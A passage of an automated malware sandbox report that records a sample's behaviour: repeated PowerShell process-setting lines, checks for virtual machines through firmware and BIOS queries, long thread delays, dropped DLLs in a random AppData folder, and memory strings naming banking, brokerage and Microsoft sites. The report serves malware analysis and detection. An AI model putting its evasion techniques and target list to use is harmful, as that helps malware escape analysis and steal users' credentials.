                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 76D83B54
                    Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: AABC87
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6182Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3523Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2062Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 482Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bplJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\accplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocolJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bplJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelperJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ktbJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\config.prxJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWizJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exe TID: 5424Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep count: 2062 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep count: 482 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4360Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BtPwzevvMNetHb
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                    Source: Setup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vmware
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QemUp
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                    Source: msiexec.exe, 0000000A.00000003.2179717349.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2197813079.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2152944130.0000000000701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: more.com, 00000008.00000002.2013261383.0000000004C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hfuyiQxXpTIZMAqEMuFVSLjikUh
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmCIxZue
